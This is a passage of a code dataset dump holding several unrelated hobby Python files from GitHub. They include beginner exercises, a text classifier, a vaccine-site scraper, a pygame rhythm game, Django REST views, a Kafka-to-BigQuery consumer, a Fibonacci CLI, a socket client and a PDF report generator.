]:\n\n\ni=0 \nwhile i !=5:\n print(\"i nin degeri : \",i)\n i+=1\nprint(i ,\" 5 e eşittir\")\n\n\n# # TEK ÇİFT\n\n# In[ ]:\n\n\na=0\nwhile a<11:\n a+=1\n islem=list(divmod(a,2))[1]\n if islem==0:\n print(\"{} Çift Sayidir\".format(a))\n elif islem==1:\n print(\"{} Tek Sayidir\".format(a))\n continue\n\n\n# # FONKSİYONLAR \n\n# In[ ]:\n\n\ndef atoplambkare(a,b):\n atoplambkare= a**2 + 2*a*b + b**2\n return atoplambkare\n\n\n# # BOOLE FONKSİYONLARI\n\n# In[ ]:\n\n\nt = True\nf = False\nprint(type(t)) \nprint(t and f) \nprint(t or f) \nprint(not t) \nprint(t != f)\n\n","repo_name":"cmt-tr/Python_Basics","sub_path":"Alistirma.py","file_name":"Alistirma.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17298435841","text":"from scipy.cluster.vq import whiten\nfrom gensim.models import KeyedVectors\nfrom gensim.corpora.dictionary import Dictionary\nfrom sklearn.neighbors import KNeighborsClassifier\nimport pandas as pd\nimport numpy as np\nimport math\nfrom numpy.random import permutation\nimport time\nimport wmd\nimport os\n\ndirs = ['business', 'entertainment', 'politics', 'sport', 'tech']\nfileCount = 0\ndocs = []\nfor folder in dirs:\n docs.append([])\n path = 'data/bbc/' + folder + '/'\n for filename in os.listdir(path):\n docs[len(docs) - 1].append(open(path + filename, \"r\").read())\n fileCount += 1\n # break\n if fileCount % 50 == 0:\n print('Processed ' + str(fileCount) + ' files')\n # break\nprint('Processed ' + str(fileCount) + ' files')\nprint('Preprocessing...')\n# preprocess data\nallWords = list()\nfor i in range(0, len(docs)):\n for j in range(0, len(docs[i])):\n docs[i][j] = wmd.preproc(docs[i][j])\n allWords += docs[i][j]\ndict = Dictionary(documents=[allWords])\n\n# create nbow vectors\nprint('Computing vectors...')\nvectors = list()\nfor i in range(0, len(docs)):\n for j in range(0, len(docs[i])):\n vector = whiten(KeyedVectors.nbow(docs[i][j], dict)) # whitening increases accuracy\n # vector = KeyedVectors.nbow(docs[i][j], dict)\n vector = np.append(vector, i) # add class column\n vectors.append(vector)\n\ndf = pd.DataFrame(vectors)\n# print('DATA FRAME:\\n' + str(df))\n\n# split data to train and test sets\nrandom_indices = permutation(df.index)\ntest_cutoff = math.floor(len(df) / 5) # 80:20 ratio\ntest_set = df.loc[random_indices[1:test_cutoff]]\ntrain_set = df.loc[random_indices[test_cutoff:]]\n\n# choose x and y sets (x - vectors columns; y - class)\nx_columns = list(range(0, len(vector) - 1))\ny_column = len(vector) - 1\n\n# CLUSTER (1-19 neighbors)\nfor n in range(1, 20):\n print(str(n) + ' neighbor(s):')\n knn = KNeighborsClassifier(n_neighbors=n)\n knn.fit(train_set[x_columns], train_set[y_column])\n predictions = knn.predict(test_set[x_columns])\n\n actual = test_set[y_column]\n rowCount = len(test_set)\n correctCount = 0\n for i in range(0, rowCount):\n if predictions[i] == actual._ndarray_values[i]:\n correctCount += 1\n\n print('Guessed ' + str(correctCount) + ' out of ' + str(rowCount) + ' (' + str(correctCount / rowCount) + '% accuracy)')\n mse = (((predictions - actual) ** 2).sum()) / len(predictions)\n print('Mean squared error: ' + str(mse))\n\n#####################################################\n\n# get data\n# print('reading data')\n# wmd.polish = False\n\n# if wmd.polish:\n# doc1 = open('data/wikipl1.txt', \"r\", encoding=\"utf8\").read()\n# doc2 = open('data/wikipl2.txt', \"r\", encoding=\"utf8\").read()\n# doc3 = open('data/wikipl3.txt', \"r\", encoding=\"utf8\").read()\n# sentence_obama = 'Prezydent przemawiał przed publicznością w Radomiu.'\n# sentence_president = 'Prezydent udzielił wywiadu reporterom w Gdańsku.'\n# else:\n# # doc1 = open('data/tech1.txt', \"r\", encoding=\"utf8\").read()\n# # doc2 = open('data/tech2.txt', \"r\", encoding=\"utf8\").read()\n# # doc3 = open('data/sport1.txt', \"r\", encoding=\"utf8\").read()\n# doc1 = open('data/wikien1.txt', \"r\", encoding=\"utf8\").read()\n# doc2 = open('data/wikien2.txt', \"r\", encoding=\"utf8\").read()\n# doc3 = open('data/wikien3.txt', \"r\", encoding=\"utf8\").read()\n# sentence_obama = 'Obama speaks to the media in Illinois'\n# sentence_president = 'The president greets the press in Chicago'\n\n# model = wmd.get_model()\n#\n# start = time.time()\n# wmd.dist(model, doc1, doc2)\n# print('Distance calculated in ' + str(time.time() - start) + ' seconds\\n')\n#\n# start = time.time()\n# wmd.dist(model, doc1, doc3)\n# print('Distance calculated in ' + str(time.time() - start) + ' seconds\\n')\n#\n# start = time.time()\n# wmd.dist(model, doc1, sentence_obama)\n# print('Distance calculated in ' + str(time.time() - start) + ' seconds\\n')\n#\n# start = time.time()\n# wmd.dist(model, sentence_president, sentence_obama)\n# print('Distance calculated in ' + str(time.time() - start) + ' seconds\\n')\n#\n# start = time.time()\n# wmd.dist(model, sentence_president, sentence_president)\n# print('Distance calculated in ' + str(time.time() - start) + ' seconds\\n')\n","repo_name":"tkaczmarz/word-embeddings","sub_path":"clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2984800583","text":"# Parse vaccination site locations for Santa Clara County\n\n# Run manually: python3 -m location_parsers.santaclara\n\nimport os\nimport re\nimport urllib3\nfrom bs4 import BeautifulSoup\n\nfrom . import header_dict\nfrom . import County, Location\nfrom . import debug_print, validate\n\n\ncounty = County(\n name=\"Santa Clara\",\n url=\"https://vax.sccgov.org/home\",\n)\n\n\ndef address_fixup(a):\n \"\"\" Add missing zip codes \"\"\"\n\n a = a.replace(\n \"2542 Monterey Highway, Gate D, San Jose, CA\",\n \"2542 Monterey Highway, Gate D, San Jose, CA 95111\",\n )\n return a\n\n\n# Returns a list of Location objects\ndef run():\n http = urllib3.PoolManager(headers=header_dict)\n r = http.request(\"GET\", county.url)\n\n soup = BeautifulSoup(r.data, \"lxml\")\n\n span = soup.find(\"span\", string=\"Where would you like to be vaccinated?\")\n fieldset = span.find_parent(\"fieldset\")\n inputs = fieldset.find_all(\"input\")\n\n locations = []\n for i in inputs:\n label = i.parent.find(\"label\")\n name = label.string\n\n div = i.parent.find(\"div\")\n address = div.string\n address = address_fixup(address)\n\n if \", CA\" not in address:\n continue\n\n l = Location(name=name, address=address, county=county.name)\n locations.append(l)\n\n options = fieldset.find_all_next(\"option\")\n for o in options:\n if \", CA\" in o.string:\n name, address, extra = re.split(\"[\\(\\)]\", o.string)\n l = Location(name=name.strip(), address=address, county=county.name)\n locations.append(l)\n\n validate(locations)\n return locations\n\n\nif __name__ == \"__main__\":\n locations = run()\n debug_print(locations)\n","repo_name":"rajbot/vaccinebot","sub_path":"location_parsers/santaclara.py","file_name":"santaclara.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"30479147966","text":"import pygame\nimport random\nimport time\n\nfrom playsound import playsound\n\npygame.init()\n\n# my variables being defined\nscreen = pygame.display.set_mode([875, 900])\n\nquality = \"\"\n\nstart = 0\n\nscore = 0\n\nquality_cords = [120,240,460,680]\n\nspawncords = [180,400,620,840]\n\nposition_praise = 400\n\nimage_up = pygame.image.load(\"/Users/aadya/Desktop/Code/python/rg/button1.png\")\nimage_down = pygame.image.load(\"/Users/aadya/Desktop/Code/python/rg/button3.png\")\nimage_right = pygame.image.load(\"/Users/aadya/Desktop/Code/python/rg/button2.png\")\nimage_left = pygame.image.load(\"/Users/aadya/Desktop/Code/python/rg/button4.png\")\n\nimage_bg = pygame.image.load(\"/Users/aadya/Desktop/Code/python/rg/bg.png\")\n\nimage_ball = pygame.image.load(\"ball.png\")\n\nimagerect_up = image_up.get_rect()\nimagerect_down = image_down.get_rect()\nimagerect_right = image_right.get_rect()\nimagerect_left = image_left.get_rect()\n\nimagerect_up.right = 210\nimagerect_up.top = 570\n\nimagerect_down.right = 430\nimagerect_down.top = 570\n\nimagerect_right.right = 650\nimagerect_right.top = 570\n\nimagerect_left.right = 870\nimagerect_left.top = 570\n\n\npygame.mixer.music.load(\"track\"+ str(random.randint(1,5))+ \".mp3\")\n\ndifficultyspeed = 1\n\nmyfont = pygame.font.SysFont(\"Cookies\", 85)\n\n# defining functions\n\ndef game_menu():\n\n pygame.display.set_caption('POPstefanija')\n pygame.display.flip()\n\ndef spawn_ball():\n global imagerect_ball\n imagerect_ball = image_ball.get_rect()\n imagerect_ball.right = random.choice(spawncords)\n imagerect_ball.top = 100\n\nrunning = True\n\nspawn_ball()\ngame_menu()\n\n#game loop\n\n\npygame.mixer.music.play(loops = -1)\n\nwhile running:\n screen.blit(image_bg, (0, 0))\n\n screen.blit(image_up, imagerect_up)\n screen.blit(image_down, imagerect_down)\n screen.blit(image_right, imagerect_right)\n screen.blit(image_left, imagerect_left)\n\n streak = myfont.render(\"streak: \" + str(score) + \"!\",1, (176,67,33))\n screen.blit(streak,(0,0))\n\n praises = myfont.render( quality ,1, (176,67,33))\n screen.blit(praises,(position_praise,120))\n\n #pygame.mixer.Sound(\"/Users/aadya/Desktop/theme.mp3\").play()\n #pygame\n\n try:\n imagerect_ball = imagerect_ball.move(0,difficultyspeed)\n screen.blit(image_ball, imagerect_ball)\n except:\n pass\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n # Whenever a key is pressed down\n elif event.type == pygame.KEYDOWN:\n\n pygame.mixer.Sound(\"/Users/aadya/Desktop/Code/python/rg/pop.mp3\").play()\n pygame\n position_praise = random.choice(quality_cords)\n\n start = time.time()\n # W -> Up; S -> Down; A -> Left; D -> Right\n if (event.key == pygame.K_UP or event.key == ord('w')) and imagerect_ball.right == 180:\n if imagerect_ball.bottom > 590 and imagerect_ball.bottom < 760:\n imagerect_ball = None\n quality = (\"good!\")\n difficultyspeed += 0.5\n score = score + 1\n else:\n imagerect_ball = None\n print(\"Bad!\")\n quality = (\"bad!\")\n score = 0\n print(\"Streak:\", score)\n spawn_ball()\n\n if (event.key == pygame.K_DOWN or event.key == ord('s')) and imagerect_ball.right == 400:\n if imagerect_ball.bottom > 590 and imagerect_ball.bottom < 760:\n imagerect_ball = None\n quality = (\"good!\")\n difficultyspeed += 0.5\n score = score + 1\n else:\n imagerect_ball = None\n quality = (\"bad!\")\n difficultyspeed = 1\n score = 0\n\n print(\"Streak:\", score)\n spawn_ball()\n\n if (event.key == pygame.K_RIGHT or event.key == ord('d')) and imagerect_ball.right == 620:\n if imagerect_ball.bottom > 590 and imagerect_ball.bottom < 760:\n imagerect_ball = None\n quality = (\"good!\")\n difficultyspeed += 0.5\n score = score + 1\n else:\n imagerect_ball = None\n quality = (\"bad!\")\n difficultyspeed = 1\n score = 0\n print(\"Streak:\", score)\n spawn_ball()\n\n if (event.key == pygame.K_LEFT or event.key == ord('a')) and imagerect_ball.right == 840:\n if imagerect_ball.bottom > 590 and imagerect_ball.bottom < 760:\n imagerect_ball = None\n quality = (\"good!\")\n difficultyspeed += 0.5\n score = score + 1\n else:\n imagerect_ball = None\n quality = (\"bad!\")\n difficultyspeed = 1\n score = 0\n print(\"Streak:\", score)\n spawn_ball()\n\n if event.key == pygame.K_ESCAPE:\n pygame.event.post(pygame.event.Event(pygame.QUIT))\n\n if time.time() - start >= 0.2:\n quality = \"\"\n pygame.display.update()\n\n\n if imagerect_ball.top > 900:\n pygame.quit()\n print (\"GAME OVER!\")\n break\n\n#end of while loop\n\n#end of code\n","repo_name":"Kawaiicutieuwu/Aadya-Rhythm-Game-POPstefanija-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43410354483","text":"#3 - Escreva um programa que recebe três inteiros como entrada do teclado e \r\n# escreva na tela a média, a soma, o produto, o menor valor e o maior valor, \r\n# usando uma linha para cada resultado.\r\n\r\na = int(input(\"Digite o primeiro valor:\"))\r\nb = int(input(\"Digite o segundo valor:\"))\r\nc = int(input(\"Digite o terceiro valor:\"))\r\nmaior = a\r\nif b > a and b > c:\r\n maior = b\r\nif c > a and c > b:\r\n maior = c\r\nmenor = a\r\nif b < c and b < a:\r\n menor = b\r\nif c < b and c < a:\r\n menor = c\r\n\r\nsoma = a + b + c \r\nmedia = soma /3\r\n\r\nprint (f\"O valor da Media é: {int(media)}\")\r\nprint (f\"A soma dos 3 numeros são: {soma}\")\r\nprint(f\"O menor número digitado foi {menor}\")\r\nprint(f\"O maior número digitado foi {maior}\")","repo_name":"gerinwz/Python","sub_path":"Atividade de operações aritimetica e lógica/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29117800837","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework import viewsets\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework import filters\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.settings import api_settings\nfrom rest_framework.permissions import IsAuthenticated\nimport requests\nimport json\nimport ast\n\nfrom profiles_api import serializers\nfrom profiles_api import models\nfrom profiles_api import permissions\n\nfrom django.http import JsonResponse\n\n\n\nclass SearchView(APIView):\n \"\"\"Search API View\"\"\"\n serializer_class = serializers.SearchSerializer\n authentication_classes = (TokenAuthentication,)\n\n def post(self, request):\n \"\"\"Return searched data\"\"\"\n serializer = self.serializer_class(data=request.data)\n sort_dict = {1:'createdAt', 2:'popularityValue', 3: 'vote'}\n\n # 400 error\n if serializer.is_valid() is False:\n return Response(\n {\"statusCode\" : 400, \"msg\" : \"Bad request error\"}\n )\n\n query = serializer.validated_data.get('query')\n sort_value = sort_dict[serializer.validated_data.get('sort')]\n page = serializer.validated_data.get('page')\n limit = serializer.validated_data.get('limit')\n\n r = requests.post('http://30ec-64-98-208-143.ngrok.io/search', json = {'query' : query})\n feeds = r.json()['Data']\n # feeds = []\n\n if request.user.is_authenticated:\n user = request.user\n favorites = user.favorites\n voted = user.voted\n\n if favorites:\n favorites = json.loads(favorites) if favorites != \"\" else [] # string to list\n for obj in feeds:\n if obj['id'] in favorites:\n obj['favorite'] = 1\n\n if voted:\n voted = json.loads(voted) if voted != \"\" else {} # string to json\n print(voted)\n for obj in feeds:\n if str(obj['id']) in list(voted.keys()):\n obj['voted'] = voted[str(obj['id'])]\n\n\n\n sorted_list = sorted(feeds, key=lambda d: d[sort_value])\n response = JsonResponse( {\"statusCode\" : 200, 'msg' : 'success', 'Data' : sorted_list[page : page + limit + 1]}, status=200)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n\n # return Response({\"msg\" : 'success', 'Data' : feeds })\n\n\nclass UserLikeView(APIView):\n \"\"\"Update Like API View\"\"\"\n serializer_class = serializers.UserLikeSerializer\n authentication_classes = (TokenAuthentication,)\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n\n # 401 error\n if request.user.is_authenticated is False:\n return Response(\n {\"statusCode\" : 401, \"msg\" : \"Unauthorized error\"}\n )\n # 400 error\n if serializer.is_valid() is False:\n return Response(\n {\"statusCode\" : 400, \"msg\" : \"Bad request error\"}\n )\n\n new_favorite_id = serializer.validated_data.get('feed_id') # int\n\n if new_favorite_id is None:\n return Response(\n {\"statusCode\" : 400, \"msg\" : \"Bad request error\"}\n )\n\n user = request.user\n user_favorites = json.loads(user.favorites) if user.favorites != \"\" else []\n\n if new_favorite_id in user_favorites:\n user_favorites.remove(new_favorite_id)\n else:\n user_favorites.append(new_favorite_id)\n\n user.favorites = json.dumps(user_favorites)\n user.save()\n\n # to do : post like change value to flask server or external DB shared with flask server\n\n response = JsonResponse( {\"statusCode\" : 200, 'msg' : 'success'},status=200)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n # return Response({\"statusCode\" : 200, 'msg' : 'success'})\n\n\nclass UserVoteView(APIView):\n \"\"\"Update favorites, voted API View\"\"\"\n serializer_class = serializers.UserVoteSerializer\n authentication_classes = (TokenAuthentication,)\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n\n # 401 error\n if request.user.is_authenticated is False:\n return Response(\n {\"statusCode\" : 401, \"msg\" : \"Unauthorized error\"}\n )\n\n # 400 error\n if serializer.is_valid() is False:\n return Response(\n {\"statusCode\" : 400, \"msg\" : \"Bad request error\"}\n )\n\n feed_id = serializer.validated_data.get('feed_id')\n vote = serializer.validated_data.get('vote')\n\n if feed_id is None or vote is None:\n return Response(\n {\"statusCode\" : 400, \"msg\" : \"Bad request error\"}\n )\n\n user = request.user\n user_voted = voted = json.loads(user.voted) if user.voted != \"\" else {}\n user_voted[str(feed_id)] = vote\n user.voted = json.dumps(user_voted)\n\n # to do : post vote change value to flask server or external DB shared with flask server\n\n user.save()\n\n response = JsonResponse( {\"statusCode\" : 200, 'msg' : 'success'},status=200)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n\n # return Response({\"statusCode\" : 200, 'msg' : 'success'})\n\n\nclass UserProfileViewSet(viewsets.ModelViewSet):\n \"\"\"Handle creating and updating profiles\"\"\"\n serializer_class = serializers.UserProfileSerializer\n queryset = models.UserProfile.objects.all()\n authentication_classes = (TokenAuthentication,)\n permission_classes = (permissions.UpdateOwnProfile,)\n filter_backends = (filters.SearchFilter,)\n search_fields = ('name', 'email',)\n\n\nclass UserLoginApiView(ObtainAuthToken):\n \"\"\"Handle creating user authentication tokens\"\"\"\n renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES\n\n\nclass UserProfileFeedViewSet(viewsets.ModelViewSet):\n \"\"\"Handles creating, reading and updating profile feed items\"\"\"\n authentication_classes = (TokenAuthentication,)\n serializer_class = serializers.ProfileFeedItemSerializer\n queryset = models.ProfileFeedItem.objects.all()\n permission_classes = (permissions.UpdateOwnFeed, IsAuthenticated)\n\n def perform_create(self, serializer):\n \"\"\"Sets the user profile to the logged in user\"\"\"\n serializer.save(contentContributorId=self.request.user)\n","repo_name":"recorder12/ssmh_backend","sub_path":"profiles_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"10015734239","text":"from kafka import KafkaConsumer\nimport json\nfrom google.cloud import bigquery\nfrom google.oauth2 import service_account\n\n\ncredentials = service_account.Credentials.from_service_account_file('/Users/gangsickmun/kafkaDocker/finalproject1-393400-9fef84669d36.json')\nclient = bigquery.Client(credentials=credentials)\ntable_id = \"finalproject1-393400.user_log.kafkabig\"\n\n# Kafka 처리를 위한 consumer 생성\nconsumer = KafkaConsumer(\n 'user_log2',\n bootstrap_servers=['34.64.190.98:9092', '34.64.190.98:9093', '34.64.190.98:9094'],\n value_deserializer=lambda x: json.loads(x.decode('utf-8'))\n)\n# 로그 데이터를 처리하여 BigQuery에 저장하는 함수\ndef insert_data_bigquery(log_data):\n errors = client.insert_rows_json(table_id, [log_data])\n if errors == []:\n print(\"새 행이 추가되었습니다.\")\n else:\n print(\"다음 에러가 발생했습니다: \", errors)\n\nfor msg in consumer:\n log_data = msg.value\n insert_data_bigquery(log_data)\n","repo_name":"happymoon1205/kafka_cluster","sub_path":"consumer_big.py","file_name":"consumer_big.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32805301261","text":"import fibonacci\nimport argparse\n\n\n\ndef main():\n # define arguments\n parser = argparse.ArgumentParser(description='Fibinacci calculator.', prog='docker run --rm [IMAGE NAME]')\n parser.add_argument('--calc', type=int, default=10, help='how many fibonacci numbers should be printed out in the sequence')\n parser.add_argument('--check', type=int, help='identify whether a number is part of the fibonacci sequence or not')\n parser.add_argument('--verbose', '-v', action='count')\n args = parser.parse_args()\n\n verbose_level = 0\n if args.verbose is not None:\n verbose_level = args.verbose\n\n \n if args.check is not None:\n user_input = args.check\n fibonacci_result = fibonacci.check_number(user_input)\n print_fibonacci_result(fibonacci_result, verbose_level)\n \n elif args.calc is not None:\n user_input = int(args.calc)\n # calculate Fibonacci sequense\n sequence = fibonacci.sequence_calc(user_input)\n # reverse sequence and print it\n sequence.reverse()\n print_out(sequence, verbose_level)\n\n\n\n\ndef print_out(data_list, verbose_level = 0, glue = \"\\n\"):\n # Print data with Glue/seprator\n if verbose_level == 0:\n # just print elements in normal\n output = glue.join(map(str, data_list))\n print(output)\n else:\n # Print with index number in debug mode\n location = len(data_list)\n for number in data_list:\n print(\"#{0}: {1}\".format(location, number))\n location -= 1\n\n\ndef print_fibonacci_result(result, verbose_level):\n if result[0] == True:\n if verbose_level == 0:\n print(\"1\")\n else:\n print(\"True: This number is #{0} in Fibonacci sequent\".format(result[1]))\n else:\n if verbose_level == 0:\n print(\"0\")\n else:\n print(\"False: Unfortunately this number is NOT in Fibonacci sequent\")\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"irajtaghlidi/fibonacci-calculator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8314330765","text":"import socket, sys, os, threading, time\nfrom _thread import *\nimport random\n\n#global\n# port = 8001\n# host = \"localhost\"\nbuffer_size = 4096\n\n#connection\ndef client_socket_creation(server_host, server_port):\n\n clientsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n #connection\n try:\n clientsocket.connect((server_host,server_port))\n except:\n print(\"error in connecting to server !\")\n exit()\n\n msg = \"Hello from client !\"\n clientsocket.send(msg.encode())\n msg = clientsocket.recv(buffer_size).decode()\n # print(msg,\"Connection established!\")\n while True:\n # msg = input(\"Enter msg: \")\n msg = str(random.randint(1,1000))\n # print(msg)\n clientsocket.send(msg.encode())\n msg = \"\"\n msg = clientsocket.recv(buffer_size).decode()\n # print(msg)\n\n time.sleep(1)\n\n clientsocket.close()\n\n\n#functions\nif __name__ == \"__main__\":\n # command line argument 'host:port'\n arg_list = sys.argv\n # print(arg_list)\n\n server_host = \"127.0.0.1\"\n server_port = 9000\n if len(arg_list) > 1:\n server_host_port = arg_list[1].split(\":\")\n server_host = server_host_port[0]\n server_port = int(server_host_port[1])\n # print(host,port)\n\n # thread for creating client socket\n t1 = threading.Thread(target = client_socket_creation,args=(server_host,server_port, ))\n\n t1.start()","repo_name":"ronitray95/distributed_iot_app_deployment_platform","sub_path":"Team_specific_codes/Team1/Hackathon1/SensorManager/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23840903162","text":"import csv, glob, base64, ntpath, re, shutil, datetime\nfrom os import listdir, path\nfrom reportlab.pdfgen import canvas\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport time\nimport numpy as np\nfrom PIL import Image\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\n\nclass ReportCreator(object):\n\t'''\n\tClass allows for downloading, parsing, and reporting of individual factories, as well as portfolio-level\n\treporting which includes all factories.\n\n\tAssumptions:\n\t- Individual file naming convention: [Factory Name] - [Month] [Year].csv\n\t- List of factories will always be provided in FactoryAttributes.csv <--this is the only necesary input besides month/year\n\n\t'''\n\tdef __init__(self, factory_attributes_file):\n\t\t'''\n\n\t\t:param factory_attributes: a file containing the list of factories\n\t\t:param year: 4-digit integer\n\t\t:param month: integer from 1-12 inclusive\n\t\t'''\n\t\tself.factory_attributes_file = factory_attributes_file\n\t\tself.raw_data_dir = path.join(path.split(self.factory_attributes_file)[0], 'raw_data')\n\t\tself.all_raw_data = [f for f in listdir(self.raw_data_dir) if path.isfile(path.join(self.raw_data_dir, f))]\n\t\tself.outputs_dir = path.join(path.split(self.factory_attributes_file)[0], 'outputs')\n\t\tself.graphs_dir = path.join(self.outputs_dir, 'graphs')\n\n\t\tself.months = []\n\n\t\t# list of factory attributes dictionaries.\n\t\t# Data Definition:\n\t\t# List of Dictionaries\n\t\t# Dictionaries have 3keys:\n\t\t# - Factory\n\t\t# - Year Built\n\t\t# - SqFootage\n\t\tself.factory_attributes = []\n\n\t\t# list of factory names, filled in later\n\t\tself.factories = []\n\n\t\t# holds final numbers by factory\n\t\t# Keys:\n\t\t# - Factory Name [String]\n\t\t# Value: Dictionary\n\t\t# Keys:\n\t\t# - Average demand\n\t\t# - Average demand per square foot\n\t\t# - Total demand\n\t\t# - Peak demand\n\t\tself.factory_outputs = {}\n\n\t\t# holds portfolio outputs by month\n\t\t# Key: Month [String]\n\t\t# Value: Dictionary\n\t\t# Keys: same as factory_outputs\n\t\tself.portfolio_outputs = {}\n\n\n\tdef get_factory_attributes(self):\n\t\t'''\n\t\tfills in the self.factories from the given file\n\t\t:return:\n\t\t'''\n\t\twith open(self.factory_attributes_file, newline='') as csvfile:\n\t\t\treader = csv.DictReader(csvfile)\n\n\t\t\tfor row in reader:\n\t\t\t\tself.factory_attributes.append(row)\n\n\t\treturn\n\t\t# comment this out, reference only\n\t\tfor factory in self.factory_attributes:\n\t\t\tprint(\"Factory Name:\", factory['Factory'])\n\t\t\tprint(\"Year Built:\", factory['Year Built'])\n\t\t\tprint(\"SqFootage:\", factory['SqFootage'])\n\n\tdef create_all_reports(self):\n\t\t'''\n\t\t1. loops through the list of factories\n\t\t2. grabs list of data files for that factory\n\t\t3. loop through data files and sends raw data to method to generate monthly reports\n\t\t:return:\n\t\t'''\n\t\tself.raw_data_dir = path.join(path.split(self.factory_attributes_file)[0],'raw_data')\n\t\tself.all_raw_data = [f for f in listdir(self.raw_data_dir) if path.isfile(path.join(self.raw_data_dir,f))]\n\n\t\tfor factory in [factory['Factory'] for factory in self.factory_attributes]:\n\t\t\tlist_of_raw_data = [f for f in self.all_raw_data if factory in f]\n\t\t\tself.create_factory_report(factory,list_of_raw_data)\n\n\n\tdef create_factory_report(self, factory, raw_data_files):\n\t\t'''\n\n\t\t:param factory: String of the factory name\n\t\t:param raw_data_files: a list of raw data file names [String]\n\t\t:return:\n\t\t'''\n\t\tfactory_year_built = [x['Year Built'] for x in self.factory_attributes if x['Factory'] == factory][0]\n\t\tfactory_sq_footage = [x['SqFootage'] for x in self.factory_attributes if x['Factory'] == factory][0].replace(',','')\n\n\t\tself.factory_outputs[factory] = {}\n\n\t\t# create pdf\n\t\tfilename = path.join(self.outputs_dir, factory + ' Summary.pdf')\n\t\tdoctitle = factory + 'Summary'\n\t\ttitle = factory\n\t\tsubtitle = 'Built in ' + str(factory_year_built)\n\n\t\t# Factory level summary page\n\t\tpdf = canvas.Canvas(filename)\n\t\tpdf.setFont('Helvetica-Bold', 36)\n\t\tpdf.setTitle(doctitle)\n\t\tpdf.drawCentredString(290, 720, title)\n\t\tpdf.setFontSize(24)\n\t\tpdf.drawCentredString(290, 690, subtitle)\n\t\tpdf.save()\n\n\t\t# accumulators for portfolio-level reporting\n\t\tport_total_kwh = 0\n\t\tport_total_sq_feet = 0\n\t\tport_peak_demand = 0\n\n\t\tfor raw_data_file in raw_data_files:\n\t\t\tfile_full_path = path.join(self.raw_data_dir, raw_data_file)\n\t\t\tm = re.search('(.*) - (.*) (.*)\\.csv',raw_data_file)\n\t\t\tmonth = m.group(2)\n\t\t\tyear = m.group(3)\n\n\t\t\tself.factory_outputs[factory][year] = {}\n\t\t\tself.factory_outputs[factory][year][month] = {}\n\n\t\t\theaders = ['Day', 'Electricity Usage (kWh)']\n\t\t\tdf = pd.read_csv(file_full_path, header=0, names=headers)\n\n\t\t\tx = df['Day']\n\t\t\ty = df['Electricity Usage (kWh)']\n\n\t\t\tself.factory_outputs[factory][year][month]['average demand'] = df['Electricity Usage (kWh)'].mean()\n\t\t\tself.factory_outputs[factory][year][month]['average demand per square foot'] = df['Electricity Usage (kWh)'].mean()/float(factory_sq_footage)\n\t\t\tself.factory_outputs[factory][year][month]['total demand'] = df['Electricity Usage (kWh)'].sum()\n\t\t\tself.factory_outputs[factory][year][month]['peak demand'] = df['Electricity Usage (kWh)'].max()\n\n\t\t\tplt.title(factory + ' - ' + month + ' ' + year)\n\t\t\tplt.plot(x,y)\n\t\t\tplt.xlabel('Day')\n\t\t\tplt.ylabel('Electricity Usage (kWh)')\n\t\t\tplt.savefig(path.join(self.graphs_dir, factory + \" \" + month + \" \" + year + \".pdf\"))\n\t\t\tplt.close()\n\n\t\t# after creating the JPGs of the plots, put them into the pdf file\n\t\treturn\n\n\tdef create_portfolio_report(self):\n\t\t'''\n\t\tcreates a portfolio-level summary report\n\t\t:return:\n\t\t'''\n\n\t\t# create list of all files including paths\n\t\tall_file_paths = [path.join(self.raw_data_dir, f) for f in self.all_raw_data]\n\t\tmonths = [f for f in self.all_raw_data]\n\t\t'''\n\t\tself.portfolio_outputs[year][month]\n\t\tself.portfolio_outputs[year][month]['average demand']\n\t\tself.portfolio_outputs[year][month]['average demand per square foot']\n\t\tself.portfolio_outputs[year][month]['total demand']\n\t\tself.portfolio_outputs[year][month]['peak demand']'''","repo_name":"elijahbotkin/tech-assignment","sub_path":"blast_off/report_creator.py","file_name":"report_creator.py","file_ext":"py","file_size_in_byte":5863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10860106410","text":"import sys\ndef problem1(path):\n\tlines = readFile(path)\n\trow = \"\"\n\tmaxNum = -sys.maxsize - 1\n\tminNum = sys.maxsize\n\tcheckSum = 0\n\tfor i in range(len(lines)):\n\t\trow = lines[i].split(\"\t\")\n\t\tfor j in 